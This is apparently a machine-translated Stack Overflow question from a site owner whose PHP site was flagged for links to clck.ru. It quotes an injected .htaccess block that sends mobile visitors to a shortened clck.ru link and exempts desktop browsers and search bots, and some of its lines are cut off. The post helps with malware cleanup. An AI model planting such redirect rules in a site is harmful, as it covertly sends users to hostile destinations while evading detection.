jjzjj

php - PHP 网站上的恶意软件,指的是 clck.ru

coder 2023-10-13 原文

<分区>

我有一个网站,根据 Sucuri SiteCheck 显然包含恶意软件.它引用了一些指向 clck.ru 的链接。

查看代码没有提到 clck.ru 或类似的。

我运行了 maldetect(在操作系统 Ubuntu 上),它找到了一些我已删除的文件。

我已经更新了所有应用程序并重新启动了系统。

但 Sucuri SiteCheck 仍未验证该站点是否干净。

我指的网站是 cphdans.dk。谁能帮我做些什么?

会不会是某种 SQL 注入(inject)攻击,所以我应该在 MySQL 数据库中搜索一些东西(找不到 clck.ru)。

更新:

.htaccess 文件被以下代码破坏:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,$
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu9$
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|a$
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleW$
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|ameri$

RewriteRule ^(.*)$ http://clck.ru/8sNeJ [L,R=302]
#########!rataman!#########

站上clcksectionRewriteCondHTTP_USER_AGENTphpmysqlapachemalware

有关php - PHP 网站上的恶意软件,指的是 clck.ru的更多相关文章

  1. ruby-on-rails - Ruby on Rails 可以部署在 Azure 网站上吗? - 2

    我可以在Azure网站上部署RubyonRails吗? 最佳答案 还没有。目前仅支持.NET和PHP。 关于ruby-on-rails-RubyonRails可以部署在Azure网站上吗?,我们在StackOverflow上找到一个类似的问题: https://stackoverflow.com/questions/12964010/

  2. ruby - 如何在非 SSL 或 http 网站上使用 Stripe? - 2

    我正在使用Rails3.2.6和Stipe进行支付。是否有可能在不购买ssl证书的情况下进行付款。我可以使用Stripe页面作为我的支付页面吗? 最佳答案 您可以使用stripe.js在技术上跳过SSL但我强烈建议您设置SSL。它所做的是将信用卡信息直接传递给stripe,然后stripe会给你一个token,用于实际进行收费。这样做意味着信用卡信息永远不会接触您的服务器,您不必担心PCI合规性。但是,您仍应设置SSL以防止中间人攻击。您可以在https://stripe.com/docs/tutorials/forms找到有关如何

  3. ruby - 运行 rackup private_pub.ru -s thin -E production 命令时无法加载此类文件 -- thin (LoadError) - 2

    我指的是pubrailscasttutorial并已正确执行所有步骤,但在运行最后一个命令时,即rackupprivate_pub.ru-sthin-Eproduction为了架设faye服务器,我收到以下错误:/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in`require':cannotloadsuchfile--thin(LoadError)from/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in`require'from/var/lib/gems/1.9.1/gems

  4. ruby-on-rails - 这个 C 和 PHP 程序员如何学习 Ruby 和 Rails? - 2

    按照目前的情况,这个问题不适合我们的问答形式。我们希望答案得到事实、引用或专业知识的支持,但这个问题可能会引发辩论、争论、投票或扩展讨论。如果您觉得这个问题可以改进并可能重新打开,visitthehelpcenter指导。关闭9年前。我来自C、php和bash背景,很容易学习,因为它们都有相同的C结构,我可以将其与我已经知道的联系起来。然后2年前我学了Python并且学得很好,Python对我来说比Ruby更容易学。然后从去年开始,我一直在尝试学习Ruby,然后是Rails,我承认,直到现在我还是学不会,讽刺的是那些打着简单易学的烙印,但是对于我这样一个老练的程序员来说,我只是无法将它

  5. ruby - 确定您使用的是哪个 ruby​​gem - 2

    如何确定正在使用哪个ruby​​gem来响应“require”语句?似乎没有帮助的gem。背景:对于hornsby-herbarium-parser项目,我使用的是gemroo。我使用了githubgemhmcgowan-roo,因为当时它比roo的ruby​​forge版本更新。我尝试在runco​​derun上测试代码,但失败了,因为它没有任何版本的roo。到这个时候,github和ruby​​forge上都有新版本的roo。我决定我也可以看看ruby​​forge的最新版本是否适用于我的代码,因为我认为ruby​​forge比githubforks更官方、更权威、更稳定。一旦我确

  6. ruby - 如何在模块化 Sinatra 应用程序中正确配置 ru。? - 2

    我正在尝试在Sinatra应用程序中使用子类化样式。所以,我有一个这样的主应用程序。classMyApprunRack::URLMap.new\"/"=>MyApp.new,"/another"=>AnotherRoute.new在config.ru中,我知道它仅用于“GET”,其他资源(例如“PUT”、“POST”)如何?我不确定我是否遗漏了一些明显的东西。而且,如果我有十个路径(/path1、/path2、...),我是否必须在config.ru中配置它们,即使它们在同一个类中? 最佳答案 应用.rbclassMyAppapp2

  7. ruby-on-rails - Ruby on Rails 不是线程安全的是什么意思? - 2

    我刚刚阅读了ROR(还没有深入研究),我听说它不是线程安全的。显然,这并不意味着不止一个人不能同时访问您的网站,那么这到底是什么意思呢?线程在ROR中发挥什么作用?他们只是指请求处理吗? 最佳答案 您的信息已过时。从2.2.2开始它是线程安全的牢记RubyMRI1.8.x,最广泛使用的Ruby实现使用GreenThreads,所以对于1.8.x,如果你创建100个线程,它们都在同一个CPU上运行。因此,当使用MRI托管Rails网站时,您可能希望运行与CPUS一样多的Ruby实例。像passenger这样的东西为你处理这件事。这曾经

  8. ruby-on-rails - Rails 还是 Sinatra? PHP程序员入门学习哪个好? - 2

    按照目前的情况,这个问题不适合我们的问答形式。我们希望答案得到事实、引用或专业知识的支持,但这个问题可能会引发辩论、争论、投票或扩展讨论。如果您觉得这个问题可以改进并可能重新打开,visitthehelpcenter指导。关闭10年前。我使用PHP的时间太长了,对它感到厌倦了。我也想学习一门新语言。我一直在使用Ruby并且喜欢它。我必须在Rails和Sinatra之间做出选择,那么您会推荐哪一个?Sinatra真的不能用来构建复杂的应用程序,它只能用于简单的应用程序吗?

  9. ruby-on-rails - 如何检查是否在网站上找到了图像? - 2

    我正在使用RubyonRailsv3.0.9,我想检查图像(在我的例子中是favicon.ico图标图像)已成功从网站检索到,如果没有,我想显示自定义图像。为了检索与网站相关的favicon.ico图像,在我的View文件中我有:image_tag"#{web_site.link}/favicon.ico",:size=>"16x16"其中web_site.link值类似于以下内容:http://stackoverflow.com/http://www.stackoverflow.com/http://facebook.com/...如何检查是否在网站上找到了图片(可能使用if...e

  10. ruby-on-rails - PHP 魔术方法 __call、__get 和 __set 的 Ruby 等价物 - 2

    我很确定Ruby有这些(等同于__call、__get和__set),否则find_by将如何在Rails中工作?也许有人可以举一个简单的例子来说明如何定义与find_by相同的方法?谢谢 最佳答案 简而言之你可以映射__调用带有参数的method_missing调用__设置为方法名称以'='结尾的method_missing调用__获取不带任何参数的method_missing调用__调用PHPclassMethodTest{publicfunction__call($name,$arguments){echo"Callingob

随机推荐